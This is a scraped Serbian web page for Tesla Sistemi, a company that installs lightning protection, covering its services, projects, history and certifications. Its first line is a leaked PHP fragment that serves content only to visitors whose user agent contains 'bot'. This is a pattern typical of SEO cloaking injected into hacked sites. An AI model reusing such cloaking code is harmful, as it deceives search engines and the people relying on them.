$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']); if((strpos($tmp, 'bot') == true)){ echo ' ?>

TESLA SISTEMI - VODEĆI SISTEM INTEGRATOR U SRBIJI

Naša ponuda obuhvata razvoj, projektovanje, montažu, puštanje u rad sistema gromobranske instalacije i održavanje istih sistema u garantnom, a po dogovoru i van garantnog roka.

Preduzeće Tesla sistemi se sastoji od više sektora među kojima je i sektor koji se bavi uvozom i prodajom opreme mnogobrojnih svetskih proizvođača.

Zaokruživši kompletnu celinu, od uvoza opreme, preko projektovanja do montaže i puštanja sistema u rad sa posedovanjem kompletne infrastrukture da se obave i najzahtevniji poslovi, korisniku pružamo maksimum za njegov uložen novac.

Elektronski gromobrani, gromobrani sa ranim startovanjem

Gromobrani sa ranim startovanjem (ESE)

Osim klasičnih gromobrana, zaštitu objekata obezbeđuju i gromobrani koji poboljšavaju elektroprovodne osobine atmosfere iznad postavljenog gromobrana. Ranije su se koristili radioaktivni gromobrani koji su zakonom zabranjeni. Danas se koriste elektronski gromobrani, čija je upotreba zakonski regulisana... 
Klasični gromobran

Klasični gromobrani

Podrazumevaju da se oko objekta postavi elektroprovodan kavez (Fardejev kavez), izrađen od dobrog elektroprovodnog materijala. Faradejev kavez je preko uzemljenja povezan sa zemljom, u koju se odvodi struja pražnjenja. To je najstariji način zaštite objekata ... 
Kisobran, kuća, Zaštita opreme

Zaštita opreme od strujnog udara

Uloga ovih zaštitnih uređaja je da spreče da do električnih uređaja stigne prenaponski talas veće vrednosti od maksimalno podnosive vrednosti napona definisanog za konkretan uređaj koji se štiti...
Svake sekunde na zemaljskoj kugli, grom udari približno oko milion puta. Od toga oko 100 gromova svake sekunde pogodi tlo. U proseku svaki kvadratni kilometar Zemljine površine godišnje pogode bar tri groma.

Štete koje uzrokuje udar groma, samo u Evropi se mere milijardama eura.

Do danas nauka nije uspela da na određenom prostoru spreči udar groma. Jedini način zaštite je da prihvatimo naelektrisanje i da ga što bezbednije po objekat i ljude sprovedemo u tlo.


NAŠI PARTNERI

JAVITE NAM SE

Lepotica priča telefonom

Mala firma?! Velika firma?! Projektantska kuća?! Instalaterska kuća?! Nije važno. Javite nam se. Zatražite rešenje Vašeg problema. Mi smo tu da Vam ponudimo rešenje. Bilo gde da se nalazite u Srbiji, rado ćemo Vas posetiti i u saradnji sa svojim partnerima rešiti Vaše zahteve.
Kontakt>

IZDVAJAMO

Najbolja cena gromobrana sa ranim startovanjem, kompletna usluga od projektovanja preko izvođenja radova i merenja doprineli su da smo u 2013. godini izveli najveći broj gromobranskih instalacija u Srbiji. Prodaja gromobrana na srpskom tržištu i izvoz gromobrana (za sada u četiri zemlje) beleži konstantan rast.

U prilogu prikazujemo najveći realizovani projekat gromobranske zaštite - HIP "Azotara" gde smo gromobranskom zaštitom pokrili industrijsku površinu od preko 100 ha. Ugrađeno je 33 gromobrana sa ranim startovanjem a uklonjeno je i 10 radioaktivnih gromobrana...


TESLA SISTEMI U MEDIJIMA

B92, jul 2014 RTS, jul 2014 Dnevnik RTS, avgust 2014

 

 

 
RTS 1, jul 2016 RTS 1, avgust 2016  

 


NAŠA PREPORUKA

 

 

Tesla sistemi
Interfoni
Audio sistemi
Alarmni sistemi
Kontrola pristupa
Video nadzor
Gromobranski sistemi
Termovizija
Sirene
Automatizacija
Inženjer
Pelco
Energija
Tehnička-zaštita
Telekomunikacije

Tesla.rs
Led displeji
Solarni sistemi
Industrija
Energetika
Sistemi za vojsku
Merenja
Svetlost i rasveta
Protiv požarni sistemi
Vozila
Perimetar
Preventiva
Energetske-instalacije
Specijalne-instalacije

 


PRIMER DEMONTAŽE RADIOAKTIVNOG GROMOBRANA

 


ISTORIJA TESLA SISTEMA

Tesla sistemi su osnovani 2006. godine. Od osnivanja do danas, imamo prosečni godišnji rast prometa od 20 - 30%. To je postalo pravilo poslovanja u prethodnih 12 godina.

 

 

 

 

Ono što nam je bitnije od svih ovih podataka, koji već pripadaju prošlom vremenu, jeste da smo kompanija sa velikim potencijalom i da možemo u budućnosti da ostvarimo još bolje rezultate. Ovo je činjenica koju stalno ističu naši korisnici, saradnici i konkurencija.

 

Nama je najvažnije da smo danas veći nego što smo bili juče i da imamo ogromnu količinu pozitivne energije koju ćemo upotrebiti da sutrašnji dan učinimo boljim od današnjeg.

 


LOGIN
niste ulogovani
e-mail adresa:
lozinka:

Zaboravili ste lozinku?   

PRETRAŽIVAČ
Unesite reč ili frazu:

NEWSLETTER
Unesite Vašu Email adresu:

TESLA SISTEMI
Ekipa na terenu

 


 

 


SUPERBRANDS
Pogledajte fotografije i video sa svečane dodele nagrada »

KATALOG
Pogledajte katalog Tesla sistema »

ISO 9001

 

 

ISO 14001

 

 

ISO 18001

 

 

ISO 20000

 

 

ISO 22301

 

 

ISO 27001

 

 

ISO 50001

 

 

ISO 37001

 

 


NIKOLA TESLA
www.tesla-museum.org »